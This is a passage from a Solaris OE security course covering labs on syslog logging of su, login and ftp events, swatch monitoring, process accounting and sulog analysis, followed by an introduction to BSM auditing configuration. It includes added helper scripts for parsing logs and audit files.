  259 root       6   0    0 2648K 1968K sleep   0:01  0.00% vold
  339 root       1  59    0   17M 9704K sleep   0:01  0.00% Xsun
  257 root       1  23    0 1576K  688K sleep   0:00  0.00% cimomboot
  183 root       1  31    0 1896K 1264K sleep   0:00  0.00% lockd
   53 root       7  33    0 1280K  784K sleep   0:00  0.00% devfseventd
  277 daemon     3  34    0 9704K 2488K sleep   0:00  0.00% dwhttpd
  376 root       1  38    0 1760K 1280K sleep   0:00  0.00% in.telnetd
   55 root       3  42    0 2288K  936K sleep   0:00  0.00% devfsadm
  202 root       8  43    0 3480K 1768K sleep   0:00  0.00% syslogd
  324 root       5  44    0 3160K 2080K sleep   0:00  0.00% dmispd

Do any of these processes need further investigation?


Task – Enabling the Syslog Facility to Report su Command Activity

In this task, you configure system logging to report use of the su command.

1. Read the Solaris OE manual pages for the su command and the syslog.conf file to enable logging of su authentication to a new log file called /var/adm/sc300log. You must create this log file before reconfiguring the syslogd facility:

touch /var/adm/sc300log

2. To test your changes, use the su command to change to another user (such as alice), and then use su again to change identity to root, but supply a wrong password, and then check these files:

/var/adm/sc300log
/var/adm/sulog

Task – Enabling the Syslog Facility to Report Failed Login Activity

In this task, you configure system logging to report failed login attempts.

1. Read the Solaris OE manual pages for the login command and the syslog.conf file to enable logging of failed login attempts.

2. Use telnet to log in to your workstation as any user but supply an invalid password, and then check the sc300log file.

Task – Enabling ftp to Report Logins

In this task, you configure system logging of ftp logins.

1. Read the Solaris OE manual page for the in.ftpd command and enable ftp to report user logins (you must update the /etc/syslog.conf and /etc/inetd.conf files).

2. Run ftp to connect to your workstation. Check that an entry appears in the /var/adm/sc300log file.


Task – Using the swatch Tool

Because this is the first third-party tool that you configure, this task takes you through the process one step at a time. The swatch tool is a little more complex to install than most tools.

The swatch download site is listed in “Additional Resources” on page 2-3. A copy of the download file (swatch.tar) is also in the /usr/local/pkg directory.

The swatch tool is a Perl program which uses some standard Perl CPAN libraries which are not included in the swatch.tar file. These can be downloaded from http://www.perl.com. The required modules are:

Time::HiRes
Date::Calc
Date::Format
File::Tail

These modules are also included in the /usr/local/pkg directory.

To install the Perl modules:

1. Create a working directory called /usr/local/cpan and unpack the Perl modules into that directory:

# mkdir -p /usr/local/cpan
# cd /usr/local/cpan
# tar -xof ../pkg/Date-Calc-4.3.tar
# tar -xof ../pkg/File-Tail-0.98.tar
# tar -xof ../pkg/TimeDate-1.10.tar
# tar -xof ../pkg/Time-HiRes-01.20.tar

You have created four subdirectories, one for each module.

2. Change directory (cd) to each directory, and then run the following commands to build and install the Perl modules:

# cd perl-module-directory
# perl Makefile.PL
# make
# make test
# make install

3. Install the swatch tool in the /usr/local directory:

# cd /usr/local
# tar xvf pkg/swatch.tar


This creates a subdirectory called swatch-3.0.1.

4. Before continuing, read the README file in the swatch directory but do not perform any of the actions in the README file. Follow these steps and compare these instructions to those in the swatch README file.

# cd /usr/local/swatch-3.0.1
# perl Makefile.PL
# make
# make test
# make install
# make realclean

5. The swatch tool requires a configuration file to determine what to look for and how to react to what is found (for example, send a message, email, or execute a program). You can find example configuration files in the /usr/local/swatch-3.0.1/examples directory. As a test, create a file called ~/.swatchrc with the following contents:

#bad logins
watchfor /auth.crit|auth.notice/
echo inverse
bell 2
write root

This file uses the write command to notify all root logins about bad logins or failed su command attempts.

6. Start the swatch utility to monitor the output from the /var/adm/sc300log file created in the previous exercises using:

./swatch -t /var/adm/sc300log

7. Use the telnet or su commands from another shell window to attempt to break in to the system (use a bad password so that the attempt fails). It might take a couple of minutes before the swatch message appears in the swatch window and all other shell windows owned by the root user. The swatch utility polls the log files on a regular basis (approximately every two minutes), so you will not see any response until the next polling interval.


Task – Starting Process Accounting

Follow the steps below, which ensure that accounting starts at boot time and that accounting programs run automatically:

1. Enable accounting startup and shutdown as part of the system boot process:

# cd /etc
# ln init.d/acct rc2.d/S22acct
# ln init.d/acct rc1.d/K22acct
# ln init.d/acct rcS.d/K22acct
# ln init.d/acct rc0.d/K22acct

2. Manually start accounting:

# sh /etc/init.d/acct start

3. Add report generation commands to the crontab entry for the adm user:

# crontab -e adm
# controls account file size
30 3 * * * /usr/lib/acct/ckpacct
# process daily report data
30 4 * * * /usr/lib/acct/runacct 2> /var/adm/acct/nite/fd2log
# generate monthly reports
30 5 1 * * /usr/lib/acct/monacct

4. Add the disk report command to the root crontab entry:

# crontab -e
# generate raw disk usage report
30 23 29 * 6 /usr/lib/acct/dodisk

You can view the accounting reports tomorrow after the overnight jobs have generated the summary data. Currently you can view the process accounting file using the acctcom command, which summarizes process data for all processes started since accounting was enabled.


5. Try the following commands:

# acctcom | more
# acctcom -n vi | more
# acctcom -n ksh | more
# acctcom -r -n ksh | more
# acctcom -k -n ksh | more

Read the Solaris OE manual pages for the acctcom command for more information and additional command-line options.


Exercise Summary

Discussion – Take a few minutes to discuss what experiences, issues, or discoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications


Exercise Solutions

The following shows an example sulog file and indicates the potential security threats that you should have identified.

Sample sulog Commentary File

SU 02/28 16:31 + console root-daemon
SU 02/28 16:51 + console root-daemon
SU 02/28 16:55 + pts/4 root-bob
SU 02/28 17:00 + pts/4 root-alice
SU 02/28 17:02 + pts/4 root-eve

This is testing the account setup for bob, alice, and eve:

SU 02/28 17:07 + pts/5 bob-root
SU 02/28 17:21 + console root-daemon
SU 03/29 14:20 + console root-daemon
SU 04/04 09:52 + console root-daemon
SU 04/05 08:55 + console root-daemon
SU 04/05 08:59 + pts/2 bob-root
SU 04/05 09:13 - pts/2 bob-alice

Why is user bob using the su command to try to access the alice account?

SU 04/10 09:10 + console root-daemon
SU 04/10 09:24 + pts/2 bob-root
SU 04/10 09:25 + pts/2 root-alice

Here is user bob again. Should he have root access, and why is he using the su command to try to become the user alice?

SU 04/10 10:14 + pts/2 bob-root
SU 04/10 11:24 + pts/3 alice-root
SU 04/10 14:46 + pts/2 bob-root
SU 04/10 14:46 + pts/2 bob-root
SU 04/12 13:50 + console root-daemon
SU 04/12 14:42 + pts/2 alice-root
SU 04/12 14:42 + pts/2 alice-root
SU 04/12 14:43 + pts/2 root-bob
SU 04/12 14:43 - pts/4 eve-root


Why is there no successful use of the su command by the user eve shown? Was the attempt a mistake or did the eve user think she had the root password?

SU 04/12 15:10 + pts/3 bob-root
SU 04/12 15:25 - pts/2 alice-root
SU 04/12 15:25 + pts/3 bob-root
SU 04/12 15:25 - pts/3 alice-root
SU 04/12 15:26 + pts/3 alice-root

After three tries, alice remembers the root password.

SU 04/13 08:46 + console root-daemon
SU 04/13 09:34 - pts/4 eve-root
SU 04/13 09:34 - pts/4 eve-root
SU 04/13 09:34 - pts/4 eve-root
SU 04/13 09:34 - pts/4 eve-root
SU 04/13 09:35 - pts/4 eve-root
SU 04/13 09:35 - pts/2 bob-root
SU 04/13 09:35 - pts/4 eve-root
SU 04/13 09:35 + pts/2 bob-root

It took two attempts before user bob successfully used the su command to become the root user.

SU 04/13 09:35 - pts/4 eve-alice
SU 04/13 09:35 - pts/4 eve-alice
SU 04/13 09:36 - pts/4 eve-alice

It looks like eve is trying to break into the system.
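The commentary above can be turned into a repeatable check. The following is an added example (not part of the course material) that parses sulog lines and reports repeated failures, source/target pairs that never succeed, and non-root users trying to become other non-root users; the sample log is constructed to follow the scenario above.

```python
"""Triage a Solaris sulog for the patterns this exercise highlights.

Added example (not part of the SC-300 course material).  The sample log
below is constructed for the example and mirrors the scenario on the page.
"""
import re
from collections import Counter

# One sulog line per su(1M) attempt:  SU MM/DD HH:MM <+|-> <tty> <from>-<to>
# ("+" = success, "-" = failure).  User names containing "-" are not handled.
SULOG_RE = re.compile(
    r"^SU\s+(?P<date>\d\d/\d\d)\s+(?P<time>\d\d:\d\d)\s+(?P<result>[+-])\s+"
    r"(?P<tty>\S+)\s+(?P<src>[^\s-]+)-(?P<dst>\S+)$"
)

# Constructed sample, following the page's scenario (eve, alice, bob).
SAMPLE_SULOG = """\
SU 04/12 14:43 + pts/2 root-bob
SU 04/12 14:43 - pts/4 eve-root
SU 04/12 15:25 - pts/2 alice-root
SU 04/12 15:25 - pts/3 alice-root
SU 04/12 15:26 + pts/3 alice-root
SU 04/13 09:34 - pts/4 eve-root
SU 04/13 09:34 - pts/4 eve-root
SU 04/13 09:34 - pts/4 eve-root
SU 04/13 09:35 - pts/4 eve-root
SU 04/13 09:35 - pts/2 bob-root
SU 04/13 09:35 + pts/2 bob-root
SU 04/13 09:35 - pts/4 eve-alice
SU 04/13 09:36 - pts/4 eve-alice
"""


def parse_sulog(text):
    """Return one dict per well-formed line; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = SULOG_RE.match(line.strip())
        if m is None:
            continue
        rec = m.groupdict()
        rec["ok"] = rec.pop("result") == "+"
        records.append(rec)
    return records


def triage(records, fail_threshold=3):
    """Flag the three things the exercise commentary points at.

    repeated_failures: (src, dst, n) where src failed to become dst at
                       least fail_threshold times (password guessing).
    never_succeeded:   (src, dst, n) failures with no success at all for
                       that pair, i.e. the source probably never knew the
                       password (eve in the exercise).
    lateral:           (src, dst) where a non-root user tries to become
                       another non-root user (bob-alice, eve-alice); root
                       switching to a user is normal administration.
    """
    failures, successes = Counter(), Counter()
    lateral = set()
    for r in records:
        pair = (r["src"], r["dst"])
        (successes if r["ok"] else failures)[pair] += 1
        if r["src"] != "root" and r["dst"] != "root":
            lateral.add(pair)
    return {
        "repeated_failures": sorted(
            (s, d, n) for (s, d), n in failures.items() if n >= fail_threshold
        ),
        "never_succeeded": sorted(
            (s, d, n) for (s, d), n in failures.items() if (s, d) not in successes
        ),
        "lateral": sorted(lateral),
    }


if __name__ == "__main__":
    for kind, items in triage(parse_sulog(SAMPLE_SULOG)).items():
        print(kind, items)
```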

Studying Processes

The first line shows a CPU-intensive process called john. This is a naive user running John the Ripper, a well-known password-cracking program.

Note – A sophisticated user would have disguised the program name and taken steps to reduce the CPU footprint by lowering the process priority.

Perhaps less obvious than John the Ripper is the program cracker which uses less CPU time than the top tool. This is the infamous crack program which also attempts to break passwords; the crack program runs at a lower priority so it is not as obvious (but does take longer to detect passwords). Often the cracker process does not even appear in the top 20 processes listed.


The remaining processes are all standard system processes. How do you know this? Only with experience and comparison of top output from different systems.

Enabling the Syslog Facility to Report su Command Activity

The following are the steps necessary to enable logging of su command activity:

1. Add the following line to the /etc/syslog.conf file:

auth.crit;auth.notice;auth.info /var/adm/sc300log

2. Create the log file and reconfigure the syslogd facility:

# touch /var/adm/sc300log
# kill -HUP pid for syslogd

3. Check that the /etc/default/su file has:

SYSLOG=YES

Enabling the Syslog Facility to Report Failed LoginActivity

The following are the steps necessary to enable logging for failed logins:

1. Ensure that the /etc/syslog.conf file contains the following linefrom the previous exercise:

auth.crit;auth.notice;auth.info /var/adm/sc300log

2. Check that the /etc/default/login file has:

SYSLOG=YES
SYSLOG_FAILED_LOGINS=0


Enabling ftp to Report Logins

The following are the steps necessary to enable logging for ftp logins:

1. Update the /etc/syslog.conf file so that the new log line reads:

auth.crit;auth.notice;auth.info;daemon.info /var/adm/sc300log

2. Edit the /etc/inetd.conf file to set the ftp line to include a -l switch:

ftp stream tcp6 nowait root /usr/sbin/in.ftpd in.ftpd -l

3. Send the hang-up signal to the inetd daemon to get it to reread its configuration file:

kill -HUP pid for inetd
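All three solutions above hinge on one syslog.conf line. The following added example (not course material) applies the syslog.conf(4) selector rules to a constructed configuration fragment: it shows which files receive an auth.notice or daemon.info message, that auth.info alone already covers auth.notice and auth.crit, and it flags a line whose selector and action are separated by spaces rather than the tab that Solaris syslogd requires.

```python
"""Evaluate Solaris syslog.conf selectors: which actions receive a message?

Added example (not part of the SC-300 course material).  It applies the
syslog.conf(4) rules the exercise relies on: a selector "facility.level"
matches that level and every more severe level; selectors on one line are
separated by ";", facilities within a selector by ","; "*" means every
facility; ".none" excludes a facility; and the selector is separated from
the action by a TAB (Solaris syslogd does not accept spaces there).
"""

# Most to least severe, as listed in syslog.conf(4).
LEVELS = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]
ALIASES = {"panic": "emerg", "error": "err", "warn": "warning"}

# Constructed fragment of /etc/syslog.conf.  The second rule is the line the
# exercise solution adds; the last line uses spaces, which Solaris rejects.
SAMPLE_CONF = (
    "# constructed sample for this example\n"
    "*.err\t/var/adm/messages\n"
    "auth.crit;auth.notice;auth.info;daemon.info\t/var/adm/sc300log\n"
    "*.info;mail.none\t/var/adm/everything\n"
    "mail.debug /var/adm/maillog\n"
)


def _severity(level):
    level = ALIASES.get(level, level)
    if level not in LEVELS:
        raise ValueError("unknown level: %s" % level)
    return LEVELS.index(level)


def parse_conf(text):
    """Return (rules, malformed).

    rules: list of (thresholds, action); thresholds maps a facility (or "*")
    to the least severe level index it accepts, or None for ".none".
    malformed: 1-based numbers of non-comment lines without a TAB separator.
    """
    rules, malformed = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "\t" not in line:
            malformed.append(lineno)
            continue
        selector, action = line.split("\t", 1)
        thresholds = {}
        for sel in selector.split(";"):
            facs, _, level = sel.strip().rpartition(".")
            value = None if level == "none" else _severity(level)
            for fac in facs.split(","):
                # a later selector on the same line overrides an earlier one
                thresholds[fac.strip()] = value
        rules.append((thresholds, action.strip()))
    return rules, malformed


def actions_for(rules, facility, level):
    """Actions (files, users, hosts) that receive a facility.level message."""
    sev = _severity(level)
    out = []
    for thresholds, action in rules:
        # a facility-specific entry wins over "*" (this is how ".none" works)
        key = facility if facility in thresholds else "*"
        if key not in thresholds:
            continue
        threshold = thresholds[key]
        if threshold is not None and sev <= threshold:
            out.append(action)
    return out


if __name__ == "__main__":
    rules, bad = parse_conf(SAMPLE_CONF)
    print("lines without a tab separator:", bad)
    for msg in ("auth.notice", "daemon.info", "daemon.debug", "mail.err"):
        print(msg, "->", actions_for(rules, *msg.split(".")))
```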

Using the swatch Tool

There are no solutions to this exercise.

Starting Process Accounting

There are no solutions to this exercise.


Module 3

The Solaris OE Basic Security Module

Objectives

Upon completion of this module, you should be able to:

● Implement auditing using the Solaris OE Basic Security Module (BSM)

● Use the BSM to log user and kernel events

● Locate and configure the necessary administrative files to implement device allocation functionality

● Allocate and de-allocate shared devices


Relevance

Discussion – The following questions are relevant to understanding security in the Solaris OE:

● The Solaris OE has many built-in utilities that can log user activities. Is there a need for something more? In particular, can you track, in detail, a specific user’s activities?

● Your systems might have numerous attached devices such as tape drives and floppy disk drives. Can you foresee dangers in allowing unrestricted access to these devices?

● Can you prevent users from overwriting your backup tapes when they are in the tape drive?

● Can you prevent non-trusted user access to your removable media devices?

● Can you ensure the validity of data copied onto removable media?


Additional Resources

Additional resources – The following references provide additional information on the topics described in this module:

● Solaris™ OE system administration collection. SunSHIELD Basic Security Module Guide. Part Number 806-1789-10.

● Solaris™ OE AnswerBook, Version 2.

● Solaris OE manual pages – allocate(1M), attributes(5), auths(1), audit(1M), auditd(1M), auditconfig(1M), audit.log(4), audit_class(4), audit_control(4), audit_user(4), audit_warn(1M), auditreduce(1M), bsmconv(1M), deallocate(1M), device_allocate(4), device_maps(4), dminfo(1M), list_devices(1M), and praudit(1M)


Solaris OE Basic Security Module Auditing

The Solaris OE can be configured to be Orange Book compliant at the C2 level of trust. One of the C2 requirements is that a comprehensive level of activity auditing takes place.

Auditing makes it possible to:

● Monitor security-relevant events that take place on the system

● Record the events in an audit trail

● Detect misuse or unauthorized activity (by analyzing the audit trail)

Auditing can also serve as a deterrent. If users know that their actions are likely to be audited, they might be less likely to attempt malicious activities. The SunSHIELD™ Basic Security Module (BSM) provides an auditing utility that can produce C2-level logging.


Successful auditing depends on two security features: identification and authentication. At login, after a user supplies a user name and password, a unique audit ID is associated with the user's initial process. The audit ID is inherited by every process started during the login session. Even if a user changes identity with the su command, all actions performed are tracked with the same audit ID. During system configuration, you select which activities to monitor, and fine-tune the degree of auditing done for individual users.

After audit data is collected, audit-reduction and interpretation tools allow the examination of interesting parts of the audit trail. For example, you can choose to look at audit records for individual users or groups, look at all records for a certain type of event on a specific day, or select records generated at a certain time of day.

Note – Use caution when choosing what to audit. The volume of data BSM produces can be an issue due to the large amount of disk space required for fully detailed logging.

In addition to process-based security risks, there are security risks associated with access to data stored on various input/output (I/O) devices. BSM has a device-allocation mechanism that allows an administrator to restrict the ways in which such devices are used and therefore minimize the security risks. The BSM device-allocation mechanism fulfills the object reuse requirements for computing systems at the C2 level.


Identifying Major BSM Components

BSM has two logical subsystems, security auditing and device allocation:

● Security auditing:

● Depends on identification and authentication

● Assigns a unique audit ID per session

● Records user activity

● Can select users, activities, or both to audit

● Device allocation:

● Controls access to devices

● Prevents unauthorized reading of, or writing to, physical media


Using Security Auditing

The security auditing feature is best understood when examined from a component level. The primary component of this subsystem is a daemon process known as /usr/sbin/auditd.

The major functions performed by the auditd daemon are to:

● Open and close audit log files in specified directories

● Extract audit data from the kernel and record it in an audit log

● Communicate administrative or operational failures using the /etc/security/audit_warn script

A command-line interface handles administrative controls.


Categorizing Audit Events

Any system action capable of being audited is a BSM audit event. These events are usually initiated by the logged-in user and might have security relevance. All audited events are one-line entries in the /etc/security/audit_event file. These audit events are further categorized as follows:

● Kernel events

● User-level events

Each event is given a:

● Number identifier ranging from 1 to 2047 for kernel events, and from 2048 to 65535 for user events.

● Name identifier: event names begin with AUE_ followed by either a sequence of uppercase letters for kernel events or by a sequence of lowercase letters for user events.

For example, the event number for the creat() system call is 4 and the event name is AUE_CREAT, while the event number for the user program inetd is 6151 and the event name is AUE_inetd_connect.
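As an added example (not course material), the following parser applies those numbering and naming rules to audit_event lines and reports entries that break them. The sample lines are constructed: the first two use the numbers and names quoted above, the class field is a placeholder rather than the real class assignment, and the last two are deliberately inconsistent.

```python
"""Classify /etc/security/audit_event entries as kernel or user events.

Added example (not part of the SC-300 course material).  It applies the
rules described above: kernel events are numbered 1-2047 and named AUE_
plus uppercase, user events are numbered 2048-65535 and named AUE_ plus
lowercase.  audit_event(4) lines have four colon-separated fields:
number:name:description:classes.  The sample lines are constructed and
their class fields are placeholders, not the real class assignments.
"""

KERNEL_RANGE = range(1, 2048)
USER_RANGE = range(2048, 65536)

# Constructed sample.  The first two use the numbers and names quoted on the
# page; the last two are deliberately inconsistent to exercise the checks.
SAMPLE_AUDIT_EVENT = """\
# constructed audit_event sample
4:AUE_CREAT:creat(2):fc
6151:AUE_inetd_connect:inetd(1M):na
2049:AUE_BADCASE:constructed case mismatch:no
70000:AUE_too_big:constructed out-of-range number:no
"""


def classify_event(line):
    """Parse one audit_event line.

    Returns None for blank and comment lines, otherwise a dict with number,
    name, description, classes, kind ("kernel", "user" or "unknown") and a
    list of consistency problems (empty when the entry is well formed).
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split(":")
    if len(fields) != 4:
        raise ValueError("expected 4 colon-separated fields: %r" % line)
    number, name, desc, classes = fields
    number = int(number)
    problems = []
    if number in KERNEL_RANGE:
        kind = "kernel"
    elif number in USER_RANGE:
        kind = "user"
    else:
        kind = "unknown"
        problems.append("number %d outside 1-65535" % number)
    if not name.startswith("AUE_"):
        problems.append("name does not start with AUE_")
    else:
        body = name[len("AUE_"):]
        if kind == "kernel" and not body.isupper():
            problems.append("kernel event name is not uppercase")
        if kind == "user" and not body.islower():
            problems.append("user event name is not lowercase")
    return {
        "number": number, "name": name, "description": desc,
        "classes": [c for c in classes.split(",") if c],
        "kind": kind, "problems": problems,
    }


def load_audit_events(text):
    """Parse a whole audit_event file; returns {event number: entry}."""
    events = {}
    for line in text.splitlines():
        entry = classify_event(line)
        if entry is not None:
            events[entry["number"]] = entry
    return events


if __name__ == "__main__":
    for num, e in sorted(load_audit_events(SAMPLE_AUDIT_EVENT).items()):
        print(num, e["name"], e["kind"], e["problems"])
```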


Assigning Events to Audit Classes

Each audit event belongs to one or more audit classes. You can configure the audit subsystem to log only certain classes of events. Assigning events to classes makes it easier to handle large numbers of events. When you use a class, you address all of the events in that class.

Thirty-two possible classes can be defined for grouping audit events. Eighteen are defined by default inside the /etc/security/audit_class file. You can add new classes up to the maximum of 32.


Interpreting Audit Records

When auditing is enabled, audit records are collected in a trail. The trail is a binary file often referred to as the audit.log file; however, the literal file name is identified by the contents of the /etc/security/audit_data file. The logs are usually kept in the /var/audit directory.

Each audit record describes the occurrence of a single audited event. These records contain the following information:

● What user initiated the action or event

● What action was attempted

● Which files were affected

● Where and when it occurred

Note – See the SunSHIELD™ Basic Security Module Guide and the Solaris OE manual pages about the audit.log file for more information regarding the interpretation of all of the fields.


Enabling BSM

The steps required to set up the environment for auditing are:

1. Execute the /etc/security/bsmconv utility.

# cd /etc/security
# ./bsmconv

2. Edit the /etc/security/audit_startup file, if required.

Use the auditconfig utility to set the kernel policy +cnt. Here processes are not suspended when audit resources are exhausted. Instead, audit records are dropped.

# cat audit_startup
#!/bin/sh
auditconfig -setpolicy +cnt

3. Reboot your operating system.


If you use device allocation there is a conflict between BSM and the vold volume management daemon. To avoid this conflict, the bsmconv script moves the volmgt daemon out of the rc2.d start-up scripts. Do not run vold and BSM together because the device allocation mechanisms conflict.

Caution – The bsmconv script adds a line to the /etc/system file to disable the ability to abort the system using the Stop-A keyboard sequence. To retain the ability to abort the system using the Stop-A keyboard sequence, comment out the line that reads “set abort_enable = 0” in the /etc/system file.

The bsmconv script creates a script that automatically starts the auditd daemon process during system initialization. The file name for this script is /etc/security/audit_startup.

This script assists in providing default configuration and audit policy information. The /etc/security directory represents the anchor directory for the auditd process.

The following audit_startup file uses the auditconfig utility to set the kernel policy +cnt. This policy ensures that processes are not suspended when audit resources are exhausted. Instead, audit records are dropped.

# cat audit_startup
#!/bin/sh
auditconfig -setpolicy +cnt

See the Solaris OE manual page covering the auditconfig utility for more information on setting audit parameters.


Disabling BSM

To disable BSM:

1. Use the /etc/security/bsmunconv utility.

2. Reboot the system.

This script removes the audit_startup script, removes cron and at jobs, and restores the volume management init.d file.

Caution – The bsmunconv script removes the line in the /etc/system file that disables the ability to abort the system using the Stop-A keyboard sequence. If you want the ability to abort the system using the Stop-A keyboard sequence to remain disabled after running the bsmunconv script, re-enter a line that reads “set abort_enable = 0” in /etc/system.


Creating an Audit Trail Using BSM

Before you initiate auditing, you must configure what gets audited, both system-wide and for individual users.

Setting Audit Flags

Audit flags indicate classes of events to audit. System-wide defaults for all users are in the /etc/security/audit_control file. In addition, you can customize what gets audited at the user level. This level of customization is defined in the /etc/security/audit_user file.


The audit_control Log Entries

The audit_control file contains a series of configuration lines. Each line is colon separated, with the first field defining a configurable parameter and the second field defining a parameter-specific configuration.


The audit_control Flag Entries

Table 3-1 shows example configuration parameters.

Table 3-1 Audit Control Parameters

Control Description

dir Directory in which to store audit logs. Can be specified multiple times to define alternate audit log directories.

minfree Remaining percentage of free space allowed in an audit directory before switching to an alternate directory.

flags Comma-separated list of audit flags enabled for actions that can be attributed to a specific user.

naflags Comma-separated list of audit flags enabled for actions that cannot be attributed to a specific user.


Table 3-2 shows some examples of audit flags that correspond to default classes.

Table 3-2 Audit Flags

Short Full name Description

fr file_read Reading data, opening a file for reading, and so on

fw file_write Writing data, opening a file for writing, and so on

fa file_attr_acc Access of object attributes: stat, pathconf, and so on

fm file_attr_mod Change of object attributes: chown, flock, and so on

fc file_creation Creation of object

fd file_deletion Deletion of object

cl file_close A close(2) system call

pc process Process operations: fork, exec, exit, and so on

nt network Network events: bind, connect, accept, and so on

ip ipc System V IPC operations

na non_attrib Non-attributable events

ad administrative Administrative actions: mount, exportfs, and so on

lo login_logout Login and logout events

ap application Application auditing

io ioctl An ioctl(2) system call

ex exec The exec(2) family of system calls (program execution)

ot other Everything else

all all All flags set


Caution – The all flag can generate large amounts of data and fill up audit file systems quickly, so use it only if you have extraordinary reasons to audit everything. Even a simple task like compiling a program of modest size (for example, five files, 5000 lines total) in less than a minute could generate thousands of audit records, occupying many megabytes of disk space.

Table 3-3 shows the prefixes that you can use to modify previously set audit flags. A class with no prefix selects both successful and failed events. The entries in a flag list are applied from left to right, so a later entry can turn off part of what an earlier one selected.

For example:

all,^ad – audits all events except administrative actions.

-lo,+fd – audits all failed login events and successful file deletions.

The audit_control and audit_user configuration files use flags and prefixes, as described in the following two sections.

Table 3-3 Audit Flag Modifiers

Prefix Definition

+ Audit only successful attempts of this type

- Audit only failed attempts of this type

^- Turn off this type of auditing for failed attempts

^+ Turn off this type of auditing for successful attempts

^ Turn off this type of auditing for both failed and successful attempts


Configuring the /etc/security/audit_control File

The audit daemon reads the audit_control file, which contains audit flags that control the type of audit records to be logged. Code 3-1 shows an example audit_control file.

Code 3-1 Example audit_control File

1 # Copyright (c) 1988 by Sun Microsystems, Inc.
2 #
3 #ident @(#)audit_control.txt 1.3 98/06/20 SMI
4 #
5 dir:/var/audit
6 dir:/etc/security/audit
7 flags:lo
8 minfree:20
9 naflags:lo,nt


Line 5 specifies that the data is stored in the /var/audit directory. In Line 7, the flags field has been set to log only login and logout activity on the system. The minfree field on Line 8 specifies that when only 20 percent of the audit data space is available (the file system where the directory resides is 80 percent full) the audit_warn shell script notifies the administrator to archive or delete the audit data in the /var/audit directory. You could edit the audit_warn shell script so that it takes action, such as compressing or moving files.

If more than one directory is specified with the dir field (as in Lines 5–6 of Code 3-1 on page 3-19), when the minfree level is reached, auditd switches to the next directory in the file. When none of the directories in the list have enough minfree space left, the daemon starts again from the beginning of the list and picks the first accessible directory with space available, writing there until the file system holding it is completely full.

By default, if all audit file systems fill up, the audit_warn script issues warnings and the audit daemon remains in a loop, sleeping and checking for space until space is freed. While there is no space, all auditable actions are suspended. To be able to free up space in that state, you might choose to define a user with no auditing attached, so that this user can still log in while processes that would generate audit records are suspended. Restrict this user to moving or archiving log files.

Note – Sometimes losing audit data is better than having system activities suspended due to audit trail overflow. You can build automatic deletion or moving of audit files into the audit_warn script, or you can set the auditconfig policy (+cnt, as in audit_startup) to drop audit records when the auditing facility runs out of space.

The naflags field in Line 9 of Code 3-1 on page 3-19 contains the audit flags that define what classes of events are audited when an action cannot be attributed to a specific user.
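The following added example (not part of the Sun course material) checks an audit_control file for the mistakes described above before you reboot into auditing: a keyword typo, a relative or non-existent dir, a minfree value outside 0-100, a malformed flag list, or a missing flags line. The sample file it builds is constructed here to match the exercise configuration at the end of this module; the temporary directory layout, the function names and the exact messages are this script's own choices.

```sh
#!/bin/sh
# Added example (not from the Sun course): check an audit_control file before
# rebooting into auditing. Prints one line per problem and returns 1 if any.

audit_control_check() {
    file=$1; rc=0
    # Pass 1: keyword and value checks, one line at a time.
    awk -F: '
        /^[ \t]*#/ || /^[ \t]*$/ { next }                 # comments and blank lines
        NF < 2 { printf("line %d: missing \":\" separator: %s\n", NR, $0); bad = 1; next }
        $1 == "dir" {
            ndir++
            if ($2 !~ /^\//) { printf("line %d: dir must be an absolute path: %s\n", NR, $2); bad = 1 }
            next
        }
        $1 == "minfree" {
            if ($2 !~ /^[0-9]+$/ || $2 + 0 > 100) { printf("line %d: minfree must be 0-100: %s\n", NR, $2); bad = 1 }
            next
        }
        $1 == "flags" || $1 == "naflags" {
            if (seen[$1]++) { printf("line %d: duplicate %s entry\n", NR, $1); bad = 1 }
            # a list of class names, each optionally prefixed with ^, + or - (Table 3-3)
            if ($2 != "" && $2 !~ /^(\^?[-+]?[a-z_]+)(,\^?[-+]?[a-z_]+)*$/) {
                printf("line %d: malformed %s list: %s\n", NR, $1, $2); bad = 1
            }
            next
        }
        { printf("line %d: unknown keyword: %s\n", NR, $1); bad = 1 }
        END {
            if (!ndir) { print "no dir: entry, so auditd has nowhere to write"; bad = 1 }
            if (!seen["flags"]) { print "no flags: entry, so no system-wide classes are preselected"; bad = 1 }
            exit bad
        }' "$file" || rc=1
    # Pass 2: every audit directory must already exist; auditd expects it to be there.
    for d in $(awk -F: '$1 == "dir" { print $2 }' "$file"); do
        [ -d "$d" ] || { echo "dir does not exist: $d"; rc=1; }
    done
    return $rc
}

# Constructed sample (the exercise configuration): primary /var/audit, overflow
# /var/audit1, switch at 10% free, audit logins, administrative actions and
# failed attribute changes. $2 is a prefix so the sample can live in a temp dir.
write_sample_audit_control() {
    cat > "$1" <<EOF
# constructed sample audit_control
dir:$2/var/audit
dir:$2/var/audit1
flags:lo,ad,-fm
minfree:10
naflags:lo,nt
EOF
}

tmp=$(mktemp -d)
mkdir -p "$tmp/var/audit" "$tmp/var/audit1"
write_sample_audit_control "$tmp/audit_control" "$tmp"
audit_control_check "$tmp/audit_control" && echo "audit_control: no problems found"
# A broken file: misspelled keyword, impossible minfree, missing directory.
printf 'dir:/nonexistent/audit\nflag:lo\nminfree:120\n' > "$tmp/audit_control.bad"
audit_control_check "$tmp/audit_control.bad" || echo "audit_control.bad: fix before rebooting"
rm -rf "$tmp"
```

Run it against the live file with audit_control_check /etc/security/audit_control; the second pass is the one that catches a dir entry whose file system is not mounted yet, which is the usual cause of auditd writing nowhere after a reboot.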


Configuring the /etc/security/audit_user File

The /etc/security/audit_user file lets you customize what is audited at the user level. Use this file to audit some users differently from others.

Three fields for each user are stored in the audit_user file entry. These fields are stored on a single line and separated with colons. The first field is the username, the second field is the always-audit field, and the third is the never-audit field. The two auditing fields are processed in sequence, so auditing is enabled by the first field and turned off by the second.

Code 3-2 shows an example of an entry in the audit_user file:

Code 3-2 Example audit_user File

# Copyright (c) 1998 by Sun Microsystems, Inc.
#
root:all:fr
audit:no:


This entry specifies that all events by the root user are audited except file reads: the never-audit field fr removes both successful and failed reads (to exclude only successful reads, use +fr in that field). The audit:no: entry adds no classes for the audit user, so that account is audited only according to the system-wide flags.

Note – Avoid leaving the all flag set in the never-audit field. This flag turns off all auditing for the user, overriding the flags set in the always-audit field.
